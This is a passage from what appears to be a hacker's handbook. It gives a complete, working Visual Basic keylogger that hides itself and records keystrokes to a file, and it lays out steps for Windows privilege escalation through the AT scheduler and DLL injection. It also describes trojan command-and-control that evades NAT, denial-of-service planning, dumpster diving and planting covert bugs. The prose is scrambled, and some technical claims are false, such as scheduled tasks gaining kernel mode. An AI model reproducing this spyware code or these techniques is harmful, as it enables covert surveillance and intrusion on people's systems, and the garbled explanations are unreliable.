The above technique can be used in spyware and keyloggers. the keyloggers or spywares cannot intercept the windows login userID & password.dll (in Windows XP the dialogue is muted by default). So now you are the most powerful user of Windows XP by leveraging to ring0.The SECURITY key contents Note: We can’t create any sub key in HKEY_LOCAL_MACHINE for security reason. Even administrators are not allowed to do so. The SAS agent is implemented by a DLL file msgina. This is because the SAS agent (Security Authentication Service agent) shuts off all the processes working with user credentials during the logon process. This message is the result of function WlxDisplaySASNotice provided by msgina. Well friends. But we can create any sub key inside any sub key of HKEY_LOCAL_MACHINE. The above keys when pressed together when no user is interactively logged on to the system cause kernel to 224 . What are you waiting for friends? It is the time to explore the uses of this ultimate power in your computing life.dll. On networked environments you may have encountered the dialogue prompting for pressing “CTRL + ALT + DEL” keys before logon process.
This is the nightmare of administrators. the vxd layer is not affected with it. But. And any program injected into vxd layer will not be shut off. which will actually copy the files in their respective places (like system32) and one registry command. 225 . Therefore. We think you can code such program. thus it can install a hook to the kernel processes also. And SAS agent then shuts off all user processes and starts the logon process. all above files can be packed inside a single package or installer. The vxd layer is the essential component of kernel itself. Actually. Just type iExpress in start->Run box and a wizard will be started for you to create an installer for your files. We can use iExpress utility provided with windows XP to create SED (Self Extraction Directive) file.invoke the SAS agent. be careful. All these commands are just commands of command prompt. Well most people still thinks that their logon passwords are safe even if any spyware is installed on the system. Enjoy a hacker’s life. But you have to code another file employing copy commands. which is not possible for spyware or keyloggers working with user credentials (even with administrator user credentials). the logon process can also be logged due to system wide hook to keyboard by the keylogger in vxd layer. throw away such thoughts and think again.
using its process identifier to load the DLL & execute the code from the DLL inside other process’s address space. Process32First and Process32Next functions. The process ID can be grabbed automatically by using the CreateToolhelp32Snapshot. 226 . It cannot execute the code present in attacking process directly to avoid the memory sharing violations. In one technique the code that needs to be executed in kernel mode is coded inside a DLL & that DLL is injected inside a process running in kernel mode. The attacking process needs to write the few bytes of machine code in the address space of victim process. Actually. Instead of exploiting any vulnerability. these machine code bytes and the DLL code executes in a separate thread created by CreateRemoteThread function. WriteProcessMemory and the process ID of victim process. These machine code bytes will when executed load the required DLL in the victim process and pass the execution to the DLL’s code. The CreateRemoteThread function creates a thread executing in a remote process and executing the code present in remote process’s memory space. To solve this problem we need to write few bytes of DLL name in a memory location in remote process’s memory space for LoadLibraryA function in victim process using VirtualAllocEx. Actually a process forces the other process (the process with kernel mode). the DLL injection in such a technique is somewhat differently done.The Privileges Leveraging Using DLL Injection Other techniques are there to leverage the privileges.
227 .Privileges Leveraging by Scheduled Tasks Service This technique is the simplest technique for privilege leveraging in windows platform. always specify the time with interval of at least 1 minute. Microsoft provides this facility for legally leveraging the privileges in windows. But there is a flaw in this service. If administrators schedule a task with interactive switch with “AT” command and the currently logged in user is not a privileged user.exe Well friends. otherwise. Now open the command console and use the AT command to add a task as: AT 7:32AM /interactive cmd. The program will be opened with kernel mode privileges if no runas user is specified in the command. The technique involves the task scheduler service in windows. Insure the task scheduler service is running by following command: NET START SCHEDULE In windows XP the Schedule task service is by default automatically started every time window boots up. the task will be scheduled for next day. The ‘/interactive’ option enables the programs opened for interaction with desktop nor the program will execute like a service. even then the task will be executed for that logged-in low privileged user with kernel mode privileges. The Schtasks command can also be used in windows XP for same purpose.
The applications in Linux use the libraries like libc and others for their execution. Instead. we can wipe out the normal working modules and can control the whole Linux machine. the module to be injected in kernel mode. The device drivers or modules to be injected in kernel mode have a specific structure.o> We can check out the loaded modules working in ring0 by the following command lsmod And to unload any module from kernel we have to use the following command Rmmod We can also use modprobe utility to install or remove the modules from kernel. These libraries are not part of kernel itself. The dll layer provides the API facility for any program to be injected in kernel mode.e. kernel itself has an interface that helps in executing its code./<modulename. They employ init_module() and cleanup_module() functions. unlike windows kernel is composed of two layers. therefore the applications cannot execute inside the kernel. Therefore any program inside the kernel has to use this interface for its execution.Leveraging privileges in Linux In Linux systems we don’t need more than one file i. 228 . The command is Insmod . Once in the kernel mode. This is because the Linux kernel does not have any API. Leveraging the privileges in Linux is much easier than in windows once you are root but the problem is that the program to be injected in the kernel are not programmed as other application programs. The job can be accomplished by a single command by any power user or root. the vxd layer & the dll layer.
The Spy ware 229 .
the e-commerce websites keep a track of user’s selections and decide their interests and presents him with objects of his interest. The spyware with only ability to record the keys pressed is also called a keylogger. we’ll develop the keyloggers and then we’ll discus and develop the spyware with screenshot capture capability. OLE. Whereas some people want to surveil the activity of other people on their systems. screenshots list of opened programs. The final motto of a spyware is stalking. An average spyware can record pressed keys & capture the screenshots. most of the spywares advertise themselves as anti-spyware and get the trust of innocent users and installs themselves on the system. 230 .The Stalking The term spyware or nowadays anti-spyware is now common among computer users and is meant for a software or a piece of software (like activeX. DLL. audio and visual recordings. this is because. Stalking is done by different stalkers differently & it depends upon the purpose. provided host system is equipped with the camera and microphone. A spyware can keep track of keypress’s. etc. I mentioned the term anti-spyware above to be meaning same as spyware. An equipped spyware has the ability to record the audio and capture the images and video from the surroundings of the hosting system. The software implementation of a stalker is called the spyware. E. component & whatever) that keeps and eye on the activity of the users of the host system.g. First.
Developing Key-logger Being a hacker without getting true control and filters of the system is shameful. it will take just few minutes longer for you to find the things. two labels and a command button and a 231 . no problem. In this section we’ll develop a very basic key logger in visual basic 6. just learn a “Hello World” program first and then try a hand on this section otherwise. Friends if you don’t know how to program in visual basic. therefore. Open the Visual Basic 6. The Visual Basic Editor Then draw a text box. the things are simpler and not weird in visual basic. you should follow this section even if you don’t know how to program in VB.0. The Form1 will be shown as shown in picture.0 editor and select Standard EXE from New Project window.
Select Label1 and in Properties window select Caption and type the title of your keylogger. And remove the Text1 from Text property of Text1 textbox. we typed LOX KEYGRABBER and select appropriate font settings by editing Font property. 232 . Similarly for Label2 set caption File and Command1 caption Start KeyScan.timer on the Form1 using tools provided in general toolbox in left side of the editor as shown in following picture. Change the Form1’s Caption from Form1 to Console.
Now click on Project menu and select Add Module and select Module from New tab and click Open.You can select the Form background color by clicking on the form and then setting the BackColor property of the Form1 from properties window. Now write following line into module Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer The above declaration text should be in single line. Now again select the Form window from view menu select Code and type the following lines Dim strLetter As String Dim strCollector As String Dim strFile As String 233 .
strCollector Close #1 End Sub Now again select the Object from View menu and double click the Command1 button (caption Start KeyScan) and type the following code Private Sub Command1_Click() App.Now select Object from View menu and double click the Form (not on controls. the labels. And type the following lines in Form_Load subroutine as shown below Private Sub Form_Load() dwAttrib = 34 strLetter = "" strCollector = "The begining:" Timer1. text boxes.Enabled = False Timer1. buttons.TaskVisible = False 234 .Interval = 140 exitCode = 0 End Sub Similarly double click on the Timer control on the form and type the following code in code window Private Sub Timer1_Timer() For i = 28 To 128 If GetAsyncKeyState(i) <> 0 Then strLetter = Chr(i) strCollector = strCollector & strLetter End If Next i Open strFile For Output As #1 Print #1. etc are called the controls).
txt" Else: strFile = Text1.exe and press Start KeyScan and the KeyGrabber.exe and that’s the simplest keylogger we’ve developed.Form1.Text End If Timer1.Enabled = True 235 .Visible = False Form1.TaskVisible = False Form1.Visible = False Form1.Text = "" Then strFile = "c:\grabbed. Now execute keygrabber.txt" Else: strFile = Text1.Hide If Text1. The whole source code is shown below Dim strLetter As String Dim strCollector As String Dim strFile As String Private Sub Command1_Click() App.txt file otherwise in the specified file in text box.Text End If Timer1.exe will be hidden from desktop (but not from task manager or tasklist) and it will grab all the key strokes in by default c:\grabbed.Hide If Text1.Caption = "Stop KeyScan" End Sub Now save the form and project with name keygrabber and from File menu click on Make keygrabber.Text = "" Then strFile = "c:\grabbed.Enabled = True Command1.
Interval = 140 exitCode = 0 End Sub Private Sub Timer1_Timer() For i = 28 To 128 If GetAsyncKeyState(i) <> 0 Then strLetter = Chr(i) strCollector = strCollector & strLetter End If Next i Open strFile For Output As #1 Print #1. strCollector Close #1 End Sub The below shown picture shows the keygrabber.Caption = "Stop KeyScan" End Sub Private Sub Form_Load() dwAttrib = 34 strLetter = "" strCollector = "The begining:" Timer1.exe window The keygrabber.Enabled = False Timer1.Command1.exe 236 .
237 .
It should be light. The Shellcode development is just like developing a payload for missile.Shellcode The code that is self sufficient to provide a shell when executed in the environment of another process is called Shellcode. 238 . But the real definition of a Shellcode has really undergone a change with the time and advancements in security & technology. undetectable & must achieve its goals successfully.
The Shellcode development is somewhat easier in Linux for that reason than in windows. We shall be discussing the Shellcode development for Linux as well as for Windows systems. The Linux uses the syscalls numbers. the target memory. 239 . Because for several API functions we have to load the corresponding DLL into the process’s memory space and then calculate the offset of the corresponding member function. and the firewalls and IDS/IPS systems. the target Operating System. The syscalls can be considered analogous to windows API functions (the DLL exports). which do not change in its different versions at least.Preliminaries of Shellcode development The development of Shellcode requires a little understanding of assembly language.
While in nonhardcoded Shellcode. 240 .Shellcode development for Windows (XP. the addresses of syscalls are searched into the executing process in memory. 2000. 2003) The Shellcode for windows fell into two categories 1) Hardcoded address Shellcode 2) Non-hardcoded address Shellcode The hardcoded Shellcodes use the addresses of system calls hardcoded into the Shellcode.
Using networks.Networking Machines can also talk to each other by means of networking. there are a lot more issues to be taken care of than to hack individual systems. With increase in size of a network the security becomes the major issue. to be a complete hacker. The OSI model consists of 7 different layers working together which are: 1) Physical 2) Data link 3) Network 4) Transport 5) Session 6) Presentation 7) Application As shown in figure 241 . Therefore. A single may have several independently working protocols. The OSI architecture is a layered model of an ideal network. The layers were introduced to isolate the different independently working protocols in a network. We are going to start with the discussion of different layers of a network rather than the networking topologies. OSI Network Layer Model ISO designed the standardized architecture of networks known as OSI (Open Systems Interconnection). In this world. For a network to be successful in transmission of data and information. it is essential. But protocols in different layers depend upon each other for a successful network transmission. you must need some networking knowledge. To hack a network. Different protocols work at different levels in a network known as layer. A network is actually a group of several protocols working together. one can tremendously increase the efficiency and reliability of his business. the corresponding counterpart systems must also be running the same set of protocols. you will find most systems connected in networks rather than individual.
The Ethernet protocol works in this layer. Data Link Layer: This is the 2nd layer of OSI model. Switches and hubs work in this layer of networks. The data in this layer flows in the form of electric signals. Broadcast means a single frame of data is addressed for all systems connected in that network segments. 242 . The broadcasting is the main facility in this layer. The devices in this layer are addressed using their hardware address also known as MAC (Media Access Control) address. This layer is composed of hardware. The network cables and other network hardware devices lie in this layer.Network Layers Architecture Physical Layer: This is the 1st layer of OSI model. Each message frame consists of a header part with source MAC address & Destination MAC address. The data flows in the form of message frames in this layer. All wireless networking protocols are linked into this layer with other network segments. This layer depends upon the network topology used.
The transport layer is the 4th layer of OSI model. The reliability in TCP means that the lost or erroneous packets are thrown away and a request for discarded data is again sent to the server.Network Layer: This is the 3rd layer of OSI model. The earlier arrival of any packet with the sequence number to be expected in future is kept in memory for later use. The server receives the SYN packet from client and sends an acknowledgement along with its own sequence number. The IP header contains source & destination IP addresses in its IP header. The networks are broken into logical segments into this layer. The data packet so formed is called SYN packet. The routers work in this layer. The routing protocols work into this layer. Transport Layer: This is the most important layer. The TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) work in this layer. which is as: The client sends a request along with its own sequence number. Remember the packet if will arrive then again will be discarded and only the packet that already arrived and kept in memory buffer will be used. The receiver of unexpected packet sends a RST packet and the connection is discarded and the whole handshaking process begins again. The data packet in this case is called SYN/ACK packet. The TCP is a reliable protocol while UDP is an unreliable protocol. The packet is attached with an IP header. Before a new connection is formed in TCP. In this way the packet tracking is done using two sequence numbers one from server and the other from the server. the three way handshake is done. This leads to the attacks on the TCP protocol. The unexpected packet arrival causes the resetting of the connection. The attacker 243 . The data sent and received is accompanied with acknowledgement receipts known as ACK packets. The IP multicasting is done in this layer. The data is encapsulated into a packet known as IP packet. The Client receives this packet and sends back the SYN /ACK packet to server containing its own sequence number. The networked systems are identified with IP (internet protocol) addresses into this layer.
This protocol results in the lesser network traffic than TCP and provides faster means of transportation. no packet tracking is done in this protocol. The encryption if applied can be applied here on the data.e. live video etc. This protocol is used where speed matters and reliability is not the big issue.can inject any data he wants to send if s/he guesses the sequence numbers perfectly and sends the packets before the respective nodes will send those sequenced packets. no acknowledgements etc are sent. The UDP is fast and non-reliable. that means. This layer keeps track of the data provided by the upper layers and sends them to their respective lower layer circuits. Application Layer: This layer is the main application. The respective applications use UDP and perform all necessary error checks on their own upper layers. This layer prepares the data provided by the application layer ready in accordance to the lower layer’s input format. Here nonreliability means the lost packets will not be recovered by the protocol again. This protocol is widely used in IP telephony and network games. The reliability can be implemented on the upper layers by the developers. which may or may not be interacting with the user. i. 244 . the program. Presentation Layer: This layer is most important from security point of view. Session Layer: Te session layer as name suggests keeps track of all connections (sessions). The other common protocol that works in transport layer is the UDP.
But in external networks. The same is with the NAT. The gateway can be considered as the embassy of a country. If anyone from a foreign country has to connect to the specific country. IPS & Firewall Systems In this IDS/IPS safely. 245 . The networks working behind such gateways may not be routed from outer world. section we are going to discus the way firewall & systems work and the ways to get passed them Actually. The gateway has minimum of two network cards installed on it & each has an ip address in adjacent network to be connected. the one which is a part of external network. covered points.The IDS.xxx. means that the external networks cannot connect to network behind the NAT gateway. The networks are growing every moment & there is a scanty of the address space in ipv4 (the xxx. The gateway as name suggests works as the entry point for the networks and provides the connectivity among networks. so we’ll be discussing only on the required The NAT The NAT can be either a router or a firewall & stands for the Network Address Translation.xxx form of addresses). their address will get translated to their NAT host ip address. then he can only be connected with the embassy of that country. Every network which is connected to another network has minimum of one gateway host. But remember the fact that the internal network hosts can be allowed to connect to external world.xxx. Let us analyze the stuff in figure. this subject is vast and cannot be here. it acts as an embassy and no one from external networks can connect to its internal hosts but only to NAT host (the gateway as usual).
But the port numbers ranging in 0 – 1024 are reserved for servers. Now we need to observe the behavior of NAT systems or firewalls. Actually servers can use any port numbers. imagine that the B_Host1 & B_Host2 are two systems present somewhere in world in an external network such as internet. Now the firewalls have a point to locate for. But how NAT identifies the inbound and outbound data packets? Well. Remember the NAT doesn’t block the outbound traffic (the traffic from inside hosts to external network). Most of the services use fixed port numbers in this range by default. surf the web & can do the e-shopping & other official stuff from A_Hosts. while the destination port number will be mostly 246 . The port numbers are actually the file descriptors which must be unique for each and every service. while target victim is one of the A_Hosts. while A_Host1 & A_Host2 lie in an unrouted network. While all other port numbers which are assigned by client software to connect to a server by default range from 1025 – 65536. Any data packet headed for a specific port number is sent to the associated service with that specific file descriptor. The outbound data packets will have source port numbers greater than 1024. Now the situation is that external hosts (B_Hosts) cannot connect to internal hosts (A_Hosts) by any means. The firewall searches for the associated port numbers and the destination IP address.In above figure. And the attacker is at anyone of the B_Hosts. Because anyone can access their e-mails. The ports are the unsigned integer values from 0 to 65536 and are the tokens which must be present in other peer for a successful connection. the answer lies in the data packet itself.
For secrecy the chat sessions 247 . The websites may contain the commands in the <HEAD> or <TITLE> tags or in hidden form fields. But there is another way out. Or a whole cookie of commands can be written to the system.below 1024 (may be larger as it depends upon the service). there are few services like DNS (Domain Name Service) for which a direct data packet is permitted by default for inbound traffic (Headed inside from external networks). There is another way mostly employed by the attackers to connect to a Trojan on an unrouted network. Consider the following scenario. Websites can be cached in victim host and websites also write the cookies. There is a feature called OLE in windows which enables any program to open any other software from it and interact with it.e. We can open the internet explorer with this feature and can connect to any web server in the world. there is no way to connect to internal unrouted network directly from outside world. In above case. Coming on to main point. This is the only way out. Well friends. We have to create hacks based on this fact. The attacker once forming a chat session with the Trojan chatbot user can interactively parse commands to it and can control the unrouted hosts. A chatbot is a program that does chatting with other users and pretends like a human. but internal hosts may connect to outside networks. Actually. the attacker has no way to connect to Trojan horse directly until he cracks the NAT system. i. the Trojan is programmed to login to a messenger server and act as a chatbot. any server using port numbers below 1024 needs administrative privileges to do it. the attacker has installed the Trojan horse on an unrouted host behind the NAT firewall and now attacker wants to connect to Trojan and send it the commands. The Trojan can be programmed to connect to attacker system automatically and send the desired data and get the required commands from attacking server. The attacking server may be a web server. In this case Trojan will react as a client and the attacker system will act as server. imagine if Trojan itself connects to the attacker! Yes.
248 . The programs & scripts can also surf the internet without even showing anything on the monitor screen. The firewalls do not block the socket clients by default and internet explorer is also a client program itself. Its nShowCmd argument (the last argument) decides whether to show a window in the desktop or to keep it executing in the memory only. The cookies are written into the current user’s home directory. The idea behind this concept is that the surfing is almost permitted without much worry on the behalf of firewall ACLs. The ShellExecute function launches the corresponding default loader for respective type of the files being provided to it as an argument. There is also one more way to receive the commands i. The information can also be sent to the remote attacker server by parsing it into URL as form’s GET method sends the information to remote server. how to get the commands? The remote attacker server can send the webpages back to the client. The programs can surf the internet using ShellExecute function. This facilitates to scramble the information from the firewalls or the human eye at much lower memory cost & without launching any other process into the memory which is more expensive from memory as well as the CPU usage perspective. The point is that it doesn’t make any sense for a firewall to detect whether a human or a program or script is surfing and impose the rules. by socket. there are several ways to get commands from remote attacker server system to anywhere in the world even behind the NAT. The commands can be sent by parsing them into webpage’s title or as the cookie.may be encrypted. Now.e. but it is difficult to read the contents of a webpage. take it in this way. We can send and receive the commands in more sophisticated and encrypted way. The simplest approach is done using the simple webpage access. We can provide it an URL to open instead of a file. But how to send commands to a remote control from external world? Well.
249 .
The Human Tracking Systems The human mind wants to live in liberty out of surveillance. What you have to do is just catch up the phone directory and get a local map and map each number to the locations in the map with the help of programming. with the help of satellite. But how. Bss) of the service provider. The base station can transmit the signals to a limited distance. Triangular Scanning In triangular scanning the mobile station Mss (mobile phone or mobile devices) is tracked using signal intensities of three different towers (or base stations. Until you have a phone associates with you don’t feel secure anymore. this truth can be used to formulate the distance of the mobile stations once the signal strength at that point is known. The mobile users can be tracked up to a precision of 30ft. Instead a much cheaper and effective solution is there named Triangular scanning or Triangulization. high signal measure means near the base station. weak means far from base station and weakest signal means at the end point of the reach from base station. But privacy is everyone’s fundamental right in this universe. The signal strength decreases with the increase in distance. But this is being difficult in this era of ultra technology. Thus. the mobile tracking is not done using satellites. But before creating the hacks we must learn about the tracking systems and their way of working so as to thwart their sophisticated surveillance. Friends if you are a programmer you can also make your own landline scanner. The exact distances can be calculated using the standard algorithms utilizing the signal strengths. No! Absolutely not the satellites. when everyone want to spy on others like our governments do. The fixed landline phone nodes can be tracked easily. 250 . The highly rated and insecurity favorite gazette is your mobile phone.e. you are deadly vulnerable. most of us will immediately respond with a well known answer i. And there is no question on creating hacks on the surveillance systems.
by calculating the distance with the help of signal intensity.Every mobile station (phone) is programmed to transmit the signal strengths of every reachable base station (signaling tower) after a short time interval. But there is a problem. Thus. Now we have two circles. Then we can draw another circle by calculating the signal strength of second base station as sent by mobile station with respect to its position. we can locate the mobile station in a circular orbit. the mobile station can be at one of these two points as clear from figure. It means that the mobile station can be anywhere in the perimeter of that circle. It means that we have effectively calculated the distances of mobile station from two towers. The mobile station can be at the intersection of these two circles. The uncertainty can be removed with more precision if we consider the signal strength of another base station (Bss2) along with first one (Bss1). We are not sure of time exactly but nearly 6-15 seconds. It helps them to decide to handover their channels to a different base station in case of weak signal of earlier base station or during the traveling. But as a lemma the circles intersect each other at two distinct points. 251 .
the mobile station is located. But there may be a flaw if three base stations will be at a 252 . But we still cannot say that at which one of the points. So beware from now. For the sake of precision we need third base stations signal (Bss3) to locate the mobile station exactly at a single point.Now we have shrunk the position of mobile station to two identifiable distinct points. you are being traced at every step. As in figure With triangular scanning the exact coordinates of mobile station can be found with an uncertainty of 30ft. The common point of intersection of three circles will be the exact position of the mobile station (Mss).
The banks and credit card companies use these nodes for the convenience of their customers. The dumb terminals are so called because they do not have a local storage or processing systems (may have a little inefficient processing unit but local storage is not 253 .straight line. The figure will clear it more. ATM machines are nothing more than dumb terminals which are connected directly with a highly efficient and fast main frame server system which may be as large a big room or even larger (you must have studied about dumb terminals and main frame computer systems in computer fundamentals). Actually. three towers or base stations are never placed in a straight line or another tower forming an angle with two towers is considered and always form a triangle of some sort that is why this scanning technique is called as triangular scanning. Then third circle may also not clarify the position from two points to a single point. Banks financial accounting servers handle all these transactions along with the logging server (may be on same system or on a different server system). The ATM Tracing Everyone uses the atm machines nowadays. therefore. The credit card transactions through such machines can be tracked with very high precision with a fixed position without a lack of single second.
The dumb terminals retrieve all their information instantly from a centralized computing unit named main frame system containing operating system and database management systems and these dumb terminals and main frame servers are connected to each other through ATM network (Asynchronous Transfer Mode) utilizing ATM protocol. whole business will get a setback & if may be 10% systems will be down in a distributed environment the overall effect will be only 10% downfall in the efficiency of business system instead of 100%. A distributed system decreases the overall failure chances. That is why the ATM transactions are so faster. Moreover in a distributed environment the work balance is also maintained for better efficiency. Suppose if a single centralized main frame system will be down. The ATM PDU (Protocol Data Unit) or data packet is 53 bytes having 48 bytes payload. Now days the companies are investing in Distributed Systems instead of a single mainframe system. the overloaded traffic is directed to the systems having less traffic at that instance. In other protocols the data packet sizes vary depending upon the conditions may be few bytes. also the receiver end does not start processing the data packets until a certain amount of data is not collected which is in most cases a larger number and that is why these protocols produce latency which cannot be afforded at any cost in financial systems otherwise unexpected results may arise. Thus. a much smaller payload and travels faster than any other protocol packets (little latency is spent in assembling and sending the smaller data packets than assembling a big one and still waiting for more data to be still befitted in the packet and then sending the fat packet). hundred bytes to kilo bytes size.allowed in atm machines nor it may result in unexpected results). 254 .
Friends. the cryptanalysis attack on a cipher text using all possible key combinations altogether or the 255 . But implementing the knowledge of cryptography in computer security has really boosted the information security. Friends.The Data Security and Cryptanalysis Attacks In this section we are going to discus the encryption & decryption systems and the possible attacks on them.g. Friends can you tell us. the DNA processors can solve quite efficiently the “Salesman Problem” type computations that any other architecture can solve. both cipher machines were the nuisance for the allied intelligence services. the allied forces now knew every move of Germans and thus prepared for it. Whereas the Quantum processors are specially designed to carry out all kinds of computations simultaneously altogether e. keep in mind that the cryptography and computer security are two different things. The German ENIGMA and Japanese counterpart. The encryption algorithm is called cipher and the encrypted information is also called cipher text and the process of decryption is also termed as deciphering. so as to reveal the scrambled information is called the cryptanalysis and the attacker is called cryptanalyst. The DNA processors and quantum processors are developed in such a way to help finding the solutions of some problems in very less time than any other processor architecture. And the study of possible attacks on encryption and decryption systems. But once the algorithm of ENIGMA was cryptanalized. E. the picture of world war changed. Different processor architectures are developed for some specific kind of problems. The proof of this concept is the Second World War itself.g. why new processor architectures and highly efficient and fast supercomputers are manufactured by efficient countries? The answer is simple the country having faster computer system can attack & break the secret message transmission before hand and prepare for future situation. the study of encryption & decryption algorithms is called cryptography.
we have to replace each character beginning from A and read the deciphered text so obtained if it makes any sense.searching certain things from an unsorted database. in this section we’ll take a look at some ancient ciphers and then. Now displace the whole cipher text we got: EMERGENCY DECLARED PREPARE HEAVY DEFENSE AND ATTACK ENEMY TOMORROW It was a simple displacement cipher. the cryptanalysis attack is carried out using the frequency of occurrence of each cipher text letter and then its 256 . In case of non-displacement mono-substitution ciphers. But there may be a random unique character chosen for each and every cipher text letter. Consider the following example cipher text GOGTIGPEA FGENCTGF RTGRCTG JGCTA FGHGPUG CPF CVVCEM GPGOA VQOQTTQY The English Language has 26 alphabets. there are only 26 possible deciphered texts for the above cipher text. The attack is simple. we observe that the letters are displaced by two places ahead in English alphabets. Well friends. It is the oldest known mono-substitution displacement cipher. we will come on to modern symmetric & asymmetric ciphers which are widely used in computer security. now analyze the cipher text and deciphered text. In mono-substitution ciphers the cipher text is of the same length as plaintext. the very suitable example is Caezar cipher. Or in scientific research to think of all aspects simultaneously about several objects. In Caezar cipher every character is just displaced two steps ahead. The mono-substitution means a single character is substituted as cipher text in place of plaintext character. Let’s do it by taking only first ciphered word as: GOGTIGPEA 1) 2) 3) 4) 5) AIANCAJYU BJBODBKZV CKCPECLAW DLDQFDMBX EMERGENCY -------------------------MAKES MAKES MAKES MAKES IT IS NO SENSE IN ENGLISH NO SENSE IN ENGLISH NO SENSE IN ENGLISH NO SENSE IN ENGLISH MAKING SENSE! WE GOT IT We got a word EMERGENCY. Let’s go to flash back and take a look at the history: The cryptography science evolved several thousand years ago when the kings supplied their orders and secret information in a concealed way.
Now answer this.frequency is matched with the frequency of alphabets in normal day life usage. which alphabet is used most of the times? You can find two answers in the question also. Well the letter ‘e’ is used mostly in whole English and its runner up is the letter‘t’. Let us try to break the following code 257 . This knowledge is quite precious in cryptanalysis. these two characters have most probability of occurrence and ‘e’ has frequency nearly 12% while ‘t’ has slightly more than 11. Now answer this. Let’s utilize this knowledge in the field. which word is used most in English language? It is ‘THE’ and this word demystifies a lots of secrets about English. but before indulging into it just take a look at the next paragraph. Friends. The above knowledge can be used in mono substitution ciphers. we are sure you know better. which character duet (digram) is used in most of the words? Well it is ‘th’. sorry you may not be able to understand it now.
Even by using million decryptions per second it could take 1 day & 11 hours to break up. The key size in DES is 56 bits.000 decryptions per seconds a brute force attack could not yield the plaintext for million years.Symmetric Ciphers The symmetric ciphers scramble the plaintext using a secret key and a strong cipher algorithm. Even with 10. If the password is short. Block ciphers take a chunk of data and pack them in a fixed sized packet and then do the ciphering and deciphering. One most used symmetric cipher is DES (Data Encryption Standard). which makes it strong enough to sustain with 256 key space to search for original key by brute forcing which was considered computationally secure at the time of evolution of DES. During the key generation process from password. 258 . with the improvements in computing efficiency and new techniques of cryptanalysis attacks the DES is no more a challenge and the security wall fall within the seconds. DES was once considered to be strongest cipher. The security of these ciphers depends upon the secrecy of the key used. Bu. But nowadays. every parity bit (the 8th bit of a byte is called parity bit) is removed and only 7 bits are used per byte. DES was the standalone encryption algorithm used in earlier computer security. It is a block cipher. computer hardware can take billions of computations simultaneously. then padding is appended to complete the size of 56 bits.
The Attack Start of Virtual War 259 .
by technically and non-technically. There are lots of ways to accomplish this task.The Reconnaissance The reconnaissance is a military term. 260 . which means gathering information about enemy from all sorts of ways. the first step involves the gathering even the small bits of information about the victim by every possible way. Similarly before attack.
can fix a permanent tiny Bluetooth inside the CPU cabinet unnoticeably. that is most helpful for hackers. A rough study of garbage paper work can help you in visualizing that what is going on inside the victim corporation. In this discussion we will discus the techniques. Such as no objects such as papers.The techniques involved in Reconnaissance The non-technical ways incorporates the social engineering. The hackers can install a recording and transmitting device on such cables. etc. damaged hard drives. No one can suspect a hacker if he/she pretends to be a regular municipality corporation’s garbage collector. but is neglected by the corporations in most cases i. which will help you in gathering information not only about the computer systems but also about any kind of secret machines. old files. the telephone cables going outside the corporations building to an unguarded place. The garbage paper work sometimes may sometimes contain the difficult userID & passwords. CPU cabinets. even the destroyed diskettes. For security reasons the corporations must define a garbage destroying policy. computer systems. Also remember to guard the network cables effectively (try to use STP type cables). by asking people. at any means should not go outside at any cost before destroying it completely. can install a radio waves transmitter inside the computer monitors capable of transmitting the video signals outside the corporation building and at the hackers end they can reconstruct the signals so as to see clearly that what is going on in the corporation systems. The dumpster diving involves the checking the whole garbage of the victim corporation which is sent out of the corporation building for the recycling. One more thing. 261 .. etc.e. The hackers can manage to read even the damaged disks. dumpster diving. It involves the observations and study of the papers and other objects in the recycle bins of the corporation. let’s discus few of them. Lots of approaches are defined to do this job. can install a Trojan horse in computer systems. monitors. studying all articles about the victim.
or any sort of machine. This information can be fed to the manufacturer’s product support website and we can have even the entire circuit diagram of the targets if we’ll be lucky (in most cases we can get without problem). when nothing is known about the target. 2) Foreigner-System: The system about which we have only partial knowledge of its internal working is termed as a foreigner system. we can study the notice fixed on the body of the system. the spare parts of the vehicles. it may be a voltage stabilizer. model number and manufacturer. We can study the manuals of the product. Whether. Every target is considered as an Alien-System in initial phase of the attack. a submersible pump set. 3) Friend-System: The system about which we know everything. 1) Alien-System: Any system about which we know nothing is termed as a alien system. Check out the working capabilities and variation in output of the systems with respect to the variation in input parameters. Sometimes we cannot manage to get the manual of the target system and then we have to emphasize to know about target’s brand name. strange computer systems or the chips and ICs. its advantages. which clearly defines the operating parameters of the system. disadvantages and vulnerabilities is termed as a friend system. a corporation building.The Alien-Box Technique In this technique the target is considered as a Alien system. In this technique the target systems are assigned three kinds of labels according to the knowledge of their working which are as 1) Alien-System 2) Foreigner-System 3) Friend-System As the target systems working starts becoming clear to the hackers they turn the label of Alien-System to Foreigner or Friend-System. 262 . whether a computer system. We can feed the required arguments to the target system and then check its output. To know more about target.
Therefore. Thus a severe DOS attack will be possible. An alien computer system can be turned into a foreigner system by effectively scanning it. The process is known as reconnaissance or recon. The strange computer systems can be checked for varying number of request and responses at the same time simultaneously. A foreigner-system has few known properties that can be used to frame an effective attack against the box. Another way. the server will be no more accessible to the rest of the world. The algorithms used in systems can be figured out by testing the input and output types.No system can always work perfectly at all possible variations of the arguments. any kind of system can only handle a finite number of requests only. otherwise result in wide deviation from normal behavior. Thus by knowing this number the attacker can eliminate all the legitimate client requests with the fake storm of requests. while the server will look like very busy but under attack. Consider we 263 . Like thermometers have a fixed space in the scale for their working. most vendors try to optimize their systems for size and speed so they’ll probably use the standardized algorithms and the standard algorithms may have flaws. every attacker has to be serious about his own anonymity and security. therefore the flay may also be replicated in target system. The recon process consists of information gathering process in which even tiny tidbits of information about the target system are gathered by any means. As we can figure out the properties of the alien system. now we can consider it as a foreigner-system. moreover. the attacker can find out the maximum number of requests served by the alien server at a given time using the statistical tests. Remember. And then. In recon phase the attacker can scan the remote systems using online scanners and proxy bouncing etc. Certainly there will be a deviation in their speed of response to provide the service and the attacker can frame a graph of such deviations in latency and thus can develop a technique to DOS attack (Denial Of Service attack) the target system. attackers employ much sophisticated approaches. But in nowadays world.
Once the attacker has scanned the target system and has gathered important information about the target system.ru (or using HTTPS) online port scanner scan the target system. 264 .have to scan a target system then the process followed will be as: Attacker (using encrypted link) a system somewhere in other country (using HTTPS) an anonymous proxy server like www. The attacker launches the attack & if the victim of attack is now under the control of attacker. the victim can be termed as Friend-system.anonymizer.
